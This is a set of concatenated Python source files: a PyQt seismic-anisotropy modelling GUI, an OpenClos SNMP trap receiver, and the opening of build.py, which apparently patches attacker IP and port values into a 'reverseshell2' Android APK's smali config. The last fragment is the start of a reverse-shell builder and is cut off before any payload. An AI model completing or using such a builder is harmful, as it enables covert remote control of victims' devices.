split_tot[i] = (tot0[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
else:
split_tot[i] = (tot45[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
if abs(rad_0[i]) > abs(rad_45[i]):
split_rad[i] = (abs(rad_0[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
else:
split_rad[i] = (abs(rad_45[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
if abs(ampz_0[i]) > abs(ampz_45[i]):
split_z[i] = (abs(ampz_0[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
else:
split_z[i] = (abs(ampz_45[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='blue')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='blue')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='blue')
if self.split_box_anray_30_60.isChecked():
split_tot = np.zeros(len(geo30_re))
split_rad = np.zeros(len(geo30_re))
split_z = np.zeros(len(geo30_re))
for i in range(len(geo30_re)):
if tot30[i] > tot60[i]:
split_tot[i] = (tot30[i] - tot60[i]) / tot60[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
else:
split_tot[i] = (tot60[i] - tot30[i]) / tot30[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
if abs(rad_30[i]) > abs(rad_60[i]):
split_rad[i] = (abs(rad_30[i]) - abs(rad_60[i])) / abs(rad_60[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
else:
split_rad[i] = (abs(rad_60[i]) - abs(rad_30[i])) / abs(rad_30[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
if abs(ampz_30[i]) > abs(ampz_60[i]):
split_z[i] = (abs(ampz_30[i]) - abs(ampz_60[i])) / abs(ampz_60[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
else:
split_z[i] = (abs(ampz_60[i]) - abs(ampz_30[i])) / abs(ampz_30[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
self.axes_anray_tot2.bar(geo30_re, split_tot, width=0.7, alpha=0.1, color='green')
self.axes_anray_rad2.bar(geo30_re, split_rad, width=0.7, alpha=0.1, color='green')
self.axes_anray_z2.bar(geo30_re, split_z, width=0.7, alpha=0.1, color='green')
if self.split_box_anray_45_90.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot45[i] > tot90[i]:
split_tot[i] = (tot45[i] - tot90[i]) / tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
else:
split_tot[i] = (tot90[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
if abs(rad_45[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_45[i]) - abs(rad_90[i])) / abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
if abs(ampz_45[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_45[i]) - abs(ampz_90[i])) / abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='yellow')
self.canvas_anray.draw()
self.canvas_anray2.draw()
except:
self.message()
self.plot_sismograma()
    # Function to update and display the reflection coefficients for the selected azimuth; xv is the radial component and zv the vertical one
def plot_sismograma_v(self):
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
self.label_x_max.setText(str((round(np.max(abs(xv)), 4))))
self.label_z_max.setText(str((round(np.max(abs(zv)), 4))))
    # Function to plot the seismogram
def plot_sismograma(self):
self.axes_sismo_x.cla()
self.axes_sismo_z.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
normal_f = self.doubleSpinBox_normalf.value()
dados_x = np.zeros([NX, NS])
dados_z = np.zeros([NX, NS])
FREQ = self.doubleSpinBox_freq.value()
OMEGA = 2 * np.pi * FREQ
GAMA = self.doubleSpinBox_gama.value()
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
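        # The wavelets built below are Gabor-style pulses: a cosine at angular frequency
        # OMEGA, phase-shifted by the reflection phase taken from the anray output and
        # tapered by the Gaussian envelope exp(-(OMEGA*tw/GAMA)**2) over the +/- TSH window.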
wr_hti = []
wz_hti = []
wr_solo = []
wz_solo = []
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_x[i, ni] = 1
dados_z[i, ni] = 1
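        # dados_x and dados_z start out as spike sections: one unit impulse per trace at
        # the basalt reflection time, later convolved (np.convolve, mode='same') with the
        # wavelet scaled by the reflection coefficient of the chosen azimuth.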
if self.checkBox_solo.isChecked():
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
t2 = self.time_solo
dados_solo_x = np.zeros([NX, NS])
dados_solo_z = np.zeros([NX, NS])
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.solo_fase_rad[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.solo_fase_z[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_solo.append(wr)
wz_solo.append(wz)
ni2 = int(t2[i] / dt)
dados_solo_x[i, ni2] = 1
dados_solo_z[i, ni2] = 1
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_rad_0
zv2 = self.refl_solo_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_30
zv2 = self.refl_solo_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_45
zv2 = self.refl_solo_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_60
zv2 = self.refl_solo_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_90
zv2 = self.refl_solo_z_90
self.plot_sismograma_v()
fatorganhodisplay = normal_f
if self.radioButton_normx.isChecked():
fatorganhodisplay = 1/np.max(abs(xv))
if self.radioButton_normz.isChecked():
fatorganhodisplay = 1/np.max(abs(zv))
if self.radioButton_norm_def.isChecked():
fatorganhodisplay = 1/self.doubleSpinBox_normalf.value()
for i in range(dados_x.shape[0]):
wx = wr_hti[i]*xv[i]
wz = wz_hti[i]*zv[i]
dados_x[i, :] = np.convolve(dados_x[i, :], wx, mode='same')
dados_z[i, :] = np.convolve(dados_z[i, :], wz, mode='same')
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
for i in range(dados_x.shape[0]):
if self.checkBox_solo_sismo2.isChecked():
if i == 0:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
else:
dados_solo_x[i, :] = 0
dados_solo_z[i, :] = 0
else:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
for i in range(0, NX):
data_x = x[i]+ (dados_x[i] + dados_solo_x[i]) * fatorganhodisplay
data_z = x[i] +(dados_z[i] + dados_solo_z[i]) * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x, where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
else:
for i in range(0, NX):
data_x = x[i] + dados_x[i] * fatorganhodisplay
data_z = x[i] + dados_z[i] * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x , where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.canvas_sismo.draw()
self.plot_sismo_azim()
self.az_tmax.setValue(np.max(t))
# Plots seismograms of the same component for two different azimuths, normalized so that the larger of the two maximum amplitudes equals 1.
def plot_sismo_azim(self):
self.axes_sismo2_1.cla()
self.axes_sismo2_2.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
dados_1 = np.zeros([NX, NS])
dados_2 = np.zeros([NX, NS])
w_1=[]
w_2=[]
r1 = 0
r2 = 0
try:
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_1[i, ni] = 1
dados_2[i, ni] = 1
FREQ = 50
OMEGA = 2 * np.pi * FREQ
GAMA = 4.
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
w = np.cos(OMEGA * tw + PSI) * np.exp(-(OMEGA * tw / GAMA) ** 2)
if self.radio_sismo_0_90.isChecked():
label1 = '0'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_0_45.isChecked():
label1 = '0'
label2 = '45'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_45
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_45
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_30_60.isChecked():
label1 = '30'
label2 = '60'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_30
r2 = self.refl_rad_60
max_1 = np.max(abs(self.refl_rad_30))
max_2 = np.max(abs(self.refl_rad_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_30
r2 = self.refl_z_60
max_1 = np.max(abs(self.refl_z_30))
max_2 = np.max(abs(self.refl_z_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_45_90.isChecked():
label1 = '45'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_45
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_45))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_45
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_45))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
for i in range(dados_1.shape[0]):
w1 = w_1[i] * r1[i]
w2 = w_2[i] * r2[i]
dados_1[i, :] = np.convolve(dados_1[i, :], w1, mode='same')
dados_2[i, :] = np.convolve(dados_2[i, :], w2, mode='same')
if max_1 > max_2:
fatorganhodisplay = 1/max_1
else:
fatorganhodisplay = 1/max_2
for i in range(0, NX):
data_1 = x[i] + dados_1[i] * fatorganhodisplay
data_2 = x[i] + dados_2[i] * fatorganhodisplay
self.axes_sismo2_1.plot(data_1, t, '-', color='black')
self.axes_sismo2_1.set_title('azimute %s' %label1)
self.axes_sismo2_1.set_ylabel('Tempo (s)')
self.axes_sismo2_1.set_xlabel('Distância (m)')
self.axes_sismo2_1.fill_betweenx(t, x[i], data_1 , where=(data_1 > x[i]), color='black')
self.axes_sismo2_2.plot(data_2, t, '-', color='black')
self.axes_sismo2_2.set_title('azimute %s' %label2)
self.axes_sismo2_2.set_ylabel('Tempo (s)')
self.axes_sismo2_2.set_xlabel('Distância (m)')
self.axes_sismo2_2.fill_betweenx(t, x[i], data_2, where=(data_2 > x[i]), color='black')
self.axes_sismo2_1.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.axes_sismo2_2.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.canvas_sismo2.draw()
except:
self.message()
def sismo_enable(self):
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
else:
self.checkBox_solo_sismo2.setEnabled(False)
# Function that converts geophone offsets to incidence angles (single layer)
def geofone_to_angle(self, number, rmin, rstep, prof):
a = []
for i in range(number):
if i == 0:
a.append(rmin)
dist = rmin
else:
dist = dist + rstep
a.append(dist)
array = np.asarray(a)
angles = np.degrees(np.arctan((array / 2) / prof))
return angles, a
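# Illustrative check (values assumed for the example, not taken from the GUI): for a
# geophone at 100 m offset over a reflector at 50 m depth, the one-layer conversion gives
# arctan((100/2)/50) = 45 degrees.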
# Function that converts geophone offsets to transmission angles (two layers),
# v1 = velocity in the soil layer, v2 = velocity in layer 1,
# p1 = soil thickness, p2 = thickness of layer 1
def geofone_to_angle_2(self, number, rmin, rstep, v1, v2, p1, p2):
li = []
for i in range(number):
if i == 0:
li.append(rmin)
dist = rmin
else:
dist = dist + rstep
li.append(dist)
arr = np.asarray(li)
a = v1 ** 2 - v2 ** 2
z = arr / 2
b = 2 * z * a
c = a * (z ** 2) - (v2 ** 2) * (p2 ** 2) + (v1 ** 2) * (p1 ** 2)
d = 2 * z * ((v2 ** 2) * (p2 ** 2))
e = (v1 ** 2) * (p1 ** 2) - (v2 ** 2) * (p2 ** 2) * (z ** 2)
p = [a, -b, c, d, e]
j = []
for i in range(len(li)):
vlist = list()
v = roots(a * x ** 4 - b[i] * x ** 3 + c[i] * x ** 2 + d[i] * x + e[i], x)
for po in v.keys():
if "I" not in str(po) and po > 0 and po < arr[i]:
vlist.append(po)
j.append(float(vlist[0]))
m = np.asarray(j)
tt = np.arctan(m / p2)
angles = np.degrees(tt)
#Angle analysis. To check the angles, just uncomment the following lines
# inc = (v1/v2)*np.sin(tt)
# angles_inc = np.arcsin(inc)
# angles_inc_degree = np.degrees(angles_inc)
# print('transmission angles', angles)
# print('incidence angles', angles_inc_degree)
# ang_critico2 = np.arcsin(v1/ v2)
# ang_critico_graus2 = ang_critico2 * 180 / np.pi
# print('critical angle =', ang_critico_graus2)
return angles
def reflect_travel_time(self, nlayer, thick1, i_l1,v1, thick2, i_l2, v2):
geo = []
if nlayer == 1:
for i in range(len(i_l1)):
geo.append(i + 1)
d = thick1/np.cos(i_l1*np.pi/180)
t = 2*d/v1
if nlayer == 2:
for i in range(len(i_l2)):
geo.append(i + 1)
d2= thick2/np.cos(i_l2*np.pi/180)
t2 = 2 * d2 / v2
theta1 = np.arcsin((v1/v2)*np.sin(i_l2*np.pi/180))
d1 = thick1 / np.cos(theta1)
t1=2*d1/v1
t = t1+t2
return(geo, t)
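# Illustrative check for the single-layer case (assumed values, not from the program):
# thick1 = 50 m, incidence angle = 45 deg, v1 = 2000 m/s gives
# d = 50/cos(45 deg) ~= 70.7 m and t = 2*d/v1 ~= 0.071 s.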
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QMainWindow()
prog = MyFirstGuiProgram(dialog)
dialog.show()
sys.exit(app.exec_())
|
trapd.py
|
'''
Created on Nov. 06, 2014
@author: yunli
'''
from pysnmp.carrier.asynsock.dispatch import AsynsockDispatcher
from pysnmp.carrier.asynsock.dgram import udp
from pyasn1.codec.ber import decoder
from pysnmp.proto import api
from threading import Thread, Event
import logging
import util
import signal
import sys
import subprocess
import concurrent.futures
from devicePlugin import TwoStageConfigurator
from propLoader import OpenClosProperty, loadLoggingConfig
from exception import TrapDaemonError
moduleName = 'trapd'
loadLoggingConfig(appName = moduleName)
logger = logging.getLogger(moduleName)
DEFAULT_HOST = "0.0.0.0"
DEFAULT_PORT = 20162
DEFAULT_MAX_THREADS = 10
trapReceiver = None
def onTrap(transportDispatcher, transportDomain, transportAddress, wholeMsg):
# don't even log the trap PDU unless we are at DEBUG level
if logger.isEnabledFor(logging.DEBUG):
while wholeMsg:
msgVer = int(api.decodeMessageVersion(wholeMsg))
if msgVer in api.protoModules:
pMod = api.protoModules[msgVer]
else:
logger.error('Unsupported SNMP version %s' % msgVer)
return
reqMsg, wholeMsg = decoder.decode(
wholeMsg, asn1Spec=pMod.Message(),
)
logger.info('Notification message from %s:%s ' % (
transportAddress[0], transportAddress[1]
)
)
reqPDU = pMod.apiMessage.getPDU(reqMsg)
if reqPDU.isSameTypeWith(pMod.TrapPDU()):
if msgVer == api.protoVersion1:
logger.debug('Enterprise: %s' % (
pMod.apiTrapPDU.getEnterprise(reqPDU).prettyPrint()
)
)
logger.debug('Agent Address: %s' % (
pMod.apiTrapPDU.getAgentAddr(reqPDU).prettyPrint()
)
)
logger.debug('Generic Trap: %s' % (
pMod.apiTrapPDU.getGenericTrap(reqPDU).prettyPrint()
)
)
logger.debug('Specific Trap: %s' % (
pMod.apiTrapPDU.getSpecificTrap(reqPDU).prettyPrint()
)
)
logger.debug('Uptime: %s' % (
pMod.apiTrapPDU.getTimeStamp(reqPDU).prettyPrint()
)
)
varBinds = pMod.apiTrapPDU.getVarBindList(reqPDU)
else:
varBinds = pMod.apiPDU.getVarBindList(reqPDU)
logger.debug('Var-binds:')
for oid, val in varBinds:
logger.debug('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
# start the 2-stage configuration in a separate thread
if trapReceiver is not None:
# execute 2-stage configuration callback if there is one configured in openclos.yaml
callback = trapReceiver.twoStageConfigurationCallback
if callback is not None and len(callback) > 0:
proc = subprocess.Popen(callback, shell=True)
returnValue = proc.wait()
if returnValue != 0:
# 2-stage configuration callback returns non-zero value indicating we SHOULD NOT continue
logger.debug('twoStageConfigurationCallback "%s" returns %d, trap ignored' % (callback, returnValue))
return
configurator = TwoStageConfigurator(deviceIp=transportAddress[0], stopEvent=trapReceiver.stopEvent)
trapReceiver.executor.submit(configurator.start2StageConfiguration)
class TrapReceiver():
def __init__(self, conf = {}):
if conf is None or not any(conf):
self.__conf = OpenClosProperty(appName = moduleName).getProperties()
else:
self.__conf = conf
# default value
self.target = DEFAULT_HOST
self.port = DEFAULT_PORT
# validate required parameter
if 'snmpTrap' in self.__conf and 'openclos_trap_group' in self.__conf['snmpTrap'] and 'target' in self.__conf['snmpTrap']['openclos_trap_group']:
self.target = self.__conf['snmpTrap']['openclos_trap_group']['target']
else:
logger.info("snmpTrap:openclos_trap_group:target is missing from configuration. using %s" % (self.target))
if 'snmpTrap' in self.__conf and 'openclos_trap_group' in self.__conf['snmpTrap'] and 'port' in self.__conf['snmpTrap']['openclos_trap_group']:
self.port = int(self.__conf['snmpTrap']['openclos_trap_group']['port'])
else:
logger.info("snmpTrap:openclos_trap_group:port is missing from configuration. using %d" % (self.port))
if 'snmpTrap' in self.__conf and 'threadCount' in self.__conf['snmpTrap']:
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers = self.__conf['snmpTrap']['threadCount'])
else:
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers = DEFAULT_MAX_THREADS)
# event to stop from sleep
self.stopEvent = Event()
self.twoStageConfigurationCallback = util.getTwoStageConfigurationCallback(self.__conf)
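# A minimal sketch of the snmpTrap section this class reads from openclos.yaml
# (key names are taken from the lookups above; the values shown are illustrative):
#   snmpTrap:
#     threadCount: 10
#     openclos_trap_group:
#       target: 0.0.0.0
#       port: 20162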
def threadFunction(self):
self.transportDispatcher = AsynsockDispatcher()
self.transportDispatcher.registerRecvCbFun(onTrap)
# UDP/IPv4
self.transportDispatcher.registerTransport(
udp.domainName, udp.UdpSocketTransport().openServerMode((self.target, self.port))
)
self.transportDispatcher.jobStarted(1)
try:
# Dispatcher will never finish as job#1 never reaches zero
self.transportDispatcher.runDispatcher()
except Exception as exc:
logger.error("Encounted error '%s' on trap receiver %s:%d" % (exc, self.target, self.port))
self.transportDispatcher.closeDispatcher()
raise TrapDaemonError("Trap receiver %s:%d" % (self.target, self.port), exc)
else:
self.transportDispatcher.closeDispatcher()
def start(self):
logger.info("Starting trap receiver...")
self.thread = Thread(target=self.threadFunction, args=())
self.thread.start()
logger.info("Trap receiver started on %s:%d" % (self.target, self.port))
def stop(self):
logger.info("Stopping trap receiver...")
self.stopEvent.set()
self.executor.shutdown()
self.transportDispatcher.jobFinished(1)
self.thread.join()
logger.info("Trap receiver stopped")
def trap_receiver_signal_handler(signal, frame):
logger.debug("received signal %d" % signal)
trapReceiver.stop()
sys.exit(0)
def main():
signal.signal(signal.SIGINT, trap_receiver_signal_handler)
signal.signal(signal.SIGTERM, trap_receiver_signal_handler)
global trapReceiver
trapReceiver = TrapReceiver()
trapReceiver.start()
# Note we have to do this in order for signal to be properly caught by main thread
# We need to do the similar thing when we integrate this into sampleApplication.py
while True:
signal.pause()
if __name__ == '__main__':
main()
|
build.py
|
import sys
import threading
from colorama import Fore, Style,init
# itertools and time are used by animate(); imported explicitly in case utils does not re-export them
import itertools
import time
from utils import *
done = False  # module-level flag read by animate(); build() currently shadows it with a local variable while the spinner threads are commented out
def animate(message):
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
print("\r"+Style.BRIGHT+Fore.GREEN+message+c+Fore.RESET, end="")
time.sleep(0.1)
def build(direc, port1, ip, args):
""" print("Datos de funcion")
print(direc)
print(port)
print(ip) """
#Preparamos la ruta
editor = "Compiled_apk_files"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
""" print("Se muestra editor")
print(editor) """
port = str(port1)
#print(port)
try:
# read all lines so the IP and port lines can be edited in place
